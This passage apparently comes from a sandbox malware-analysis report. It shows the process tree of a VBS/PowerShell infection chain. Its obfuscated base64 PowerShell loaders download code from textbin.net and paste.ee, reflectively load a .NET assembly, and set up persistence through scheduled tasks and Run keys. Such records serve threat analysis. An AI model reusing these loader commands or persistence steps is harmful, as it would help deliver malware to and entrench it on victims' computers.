★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        
        PID:2196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:6092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5732
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:4476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5320
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2156
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2228
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:776
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3232
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5196
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    PID:1196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:3832
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        
        PID:3828
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5808
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
